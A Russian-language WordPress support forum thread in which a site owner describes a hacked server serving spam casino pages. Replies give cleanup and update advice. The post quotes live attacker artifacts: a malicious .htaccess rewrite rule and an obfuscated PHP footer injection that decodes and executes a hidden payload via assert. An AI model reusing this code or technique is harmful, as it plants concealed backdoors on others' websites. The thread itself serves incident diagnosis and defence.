Поддержка Проблемы и решения Взломан сервер

  • Доброе время суток.

    У меня был взломан сервер не так давно. Взломщик очень интересно использовал мои сайты. На них появились левые страницы с рекламой казино Вулкан(кстати, очень интересно что об этом скажет само казино). Страниц появляется обычно не больше сорока. В итоге человек может попросту не заметить такое «пополнение».

    При попытке починить следы проникновения пришел в ужас. Были внесены изменения в .htaccess и в огромное количество файлов и папок. Появились десятки файлов, которые вполне правдоподобно копируют структуру WordPress и носят названия вполне реально существующих файлов.

    Пример изменения .htaccess:

    RewriteCond %{QUERY_STRING} ^a1=(.*)
    RewriteRule ^$ /wp-admin/css/ef/%1 [QSA,L]

    Строка RewriteCond %{QUERY_STRING} ^a1=(.*) я так понял отвечает за генерацию страницы на сайте жертвы. В URL входит это буквосочетания a1.

    Строка RewriteRule ^$ /wp-admin/css/ef/%1 [QSA,L] обращается в свою очередь к папке, которую создал злоумышленник в нормальной директории /wp-admin/css/ в ней находится огромное количество файлов, которые явно не входят в структуру лицензионного оригинального WordPress.

    Кроме того, в каждом футере сайтов был прописан следующий код:

    <?php $Dh0jnHB="FyEpKPIQcokW7q7XOlxDfZ1XVGTP1Q3CEsngkGtzLA8a90HXR//KxlJK8ce1mGrtAhgf0F5elLnTnmblUb+tgj7BZ102utSpA+u6uey1nJfwUX0dnqnm0R4DP360yBayWAt3f6ZlnbX1AiLfsTGCTj2Kdh1WJlA78kCwdcqLm6u0iAKhvV+/gej3PW9OuVWshM+GkgaplBqrfS4YBfo3MiKF+yiv9LJsv5ZJY6gB3U83imcIAegxymigNhdEKJQ9JPWfL2AtNhdMKL3/xJLh/ViK+gVTBKaCk6ybMglQDq1QX89faddSB079gtZ7sNfsYfMOX0jIw7YDrG128hUmx/vi87keQim6JkCuwz/yiNSNT3DmrEIqqQVNDqLQGiE20ZziILtVOLpsUcP8oEHlcE5qSIfxb/9X5ldgtTvZKDwKpdg7pTUSJiCb9Y8bR4KIu5bbhf+dBlW4ojLOTUfAG9sVb1gTS/9K14O8UarJZOEin4I2C4nM4kzl1voN1h57VnZAvfSeDwCyU23ruzwW0XiYIN5Sq7cK9qVht8BaPOBSRUQP0qVBGUWj+bSzkIK/fcNG03WYKWjM49buwpawd+J5moTdUl3KJwwsXAhK0KxfnzRSs/dg7YP2QGyiTj092ZmiqdYX+HIHbkVnZh021XRjcDEmCuRG2bNMb7r9vwboRSgHQV6/UpNHKyFcAsJ2fRdmlFD0vukJknSeHfsEYbseMPtQwYXDCbgGKD5uiTodeJFjJ0VvVXNniA7PIoytCu6MFlU6WlBxgFW1ZPPcBwAgvkDzwgxSB/E1Z1nRsLVcnCDD5VsxxmLXPUhq1QZjLovRZSMvqzFBUUnbuvfzrqzaOScGVoVSr8NUWo/ZyNgy4sYrY8u7kY3Quia8fZ48/qGLngrXrc3ob4Nybp5siG9goaEictUlPHizcdj+qdQFMoZFH8UM2ZmgorF5aSAfFa4R8VYIzjTcMMyxTX0kTpGYroTPTcaVgm18snCim8UeV6IK8QcmZ5ICxMBkN/ekwtcsf/Wsrc2jc/5mZwO5pATPtqSi9lVt1wkYlVcJ83ASqXWQW5zDAmub0Gl3pOv0PiGZgYH1EzyLFmoSKOdCod8eHlC+NG6+1eawFYN2Wk3+Rp9Y32tVhddwd6NsUUVfXNjLzHfDMjzenlrYbJpRedXtBv3lMTFok1VTA9AxEc5z11ng7M5zYPOPNoJmL3XjKPTJKtPNai45sC7fRqQYzjHUM6nLO6RXxH3735a+Zf4mHjKlGwPT8vre1EJs/Z2OMwRsIUKXk1B1/R1fRg2Qx6oaVe8LiQlP3RNSbrstxNsxnJi5u5s5ej3tktSKW5AX5j+CV/xEtb96pCcLJFUArKO0XQ==";$lrdNj6Us="\x62\x61\x73";$gFctuyg="\x61";$RQMZ8S="Fl1YmASDI3UWZZwX83PlIpxcFiUYZtfg1bNWnIdeyVMJ5Xr";$mMJoXP5="\x73\164";$uMZQ71Pw="\x67\172\x69";$gFctuyg.="\x73";$mMJoXP5.="\x72\x5f\x72";$lrdNj6Us.="\145\x36\x34";$RQMZ8S.="7WqfdXIzeONK6EyxR2lbyyKv4O4LcJnsyS2zbuCv4r0MTzg";$uMZQ71Pw.="\156\x66";$lrdNj6Us.="\x5f\x64\145\143";$uMZQ71Pw.="\x6c\x61";$gFctuyg.="\163\145";$mMJoXP5.="\157\x74";$RQMZ8S.="fnJZBLAbLTEhMjaen2WfjDCqixwPXA/XVHhNKEZSJkzaStp";$mMJoXP5.="\61\x33";$uMZQ71Pw.="\x74\x65";$gFctuyg.="\162\164";$lrdNj6Us.="\x6f\144\145";$RQMZ8S.="LtIpTSIf1uAGJhUIWOQIHc9bjYAQDCXAJQzNnKHAn0O";@$gFctuyg($uMZQ71Pw($lrdNj6Us($mMJoXP5($RQMZ8S))));?>

    Масштабы поражения системы просто ужасны. Было потрачено часов восемь, чтобы просто осознать, что все сайты по сути надо удалять и заново заливать. Изменения в структуру CMS внесены очень глобальные и серьезные. И не факт, что я заметил все.

    Вопрос в следующем — как вы думаете, следует ли мне поменять хостера? У них все валят на уязвимости в WordPress.

    И как мне вообще теперь поступить? Даже восстановив систему, я могу просто получить повторение разрушительного хака.

Просмотр 3 ответов — с 16 по 18 (всего 18)
  • С другой стороны — вряд ли найдется такой человек, у которого каждый день есть свободное время на то, чтобы проверять.

    Вы извините, но если сайт Вам дорог, то заглянуть хотя бы раз в неделю в админку и обновить плагины/темы — не должно быть проблемой. Вы же контентом сайт наполняете — в админбаре видно количество необходимых обновлений.

    Но как можно не обновлять 2года(!!!)?. Хотя справедливости ради — далеко не все обновляют. Правда, подавляющее большинство из них потом жалуются, что у них вирус, дорвеи, выпадения из индекса и тд.

    Модератор Yui

    (@fierevere)

    ゆい

    А мне это все стоило пять суток растраченных безвозвратно нервов

    а можно было просто иногда заходить смотреть… хоть нервы бы сохранили

    как можно не обновлять 2года(!!!)

    надеюсь это был только wordpress, и ПО VDS хотя бы обновлялось,
    а то за 2 года на необновляемом сервере можно такой рассадник устроить…

    UPD

    Уважаемые собратья по несчастью, которые найдут этот топик через поиск!

    Указанный плагин WPtouch с уязвимостью даже после удаления через панель управления оставляет после себя папку WPtouch data.

    Эту папку следует удалить через FTP.

    И проверяйте регулярно папку Uploads. В нее очень любят заливать всякие вкусняшки. В ней не должно быть php файлов и архивов. Кроме того, следует проверять и изображения в папках Uploads. Для этого замечательно подходит плагин https://wordpress.org/plugins/wordfence/installation/

    Данный плагин после сканирования хорошо отображает все недопустимые и измененные хакером файлы.

    Всем спасибо.

Просмотр 3 ответов — с 16 по 18 (всего 18)
  • Тема «Взломан сервер» закрыта для новых ответов.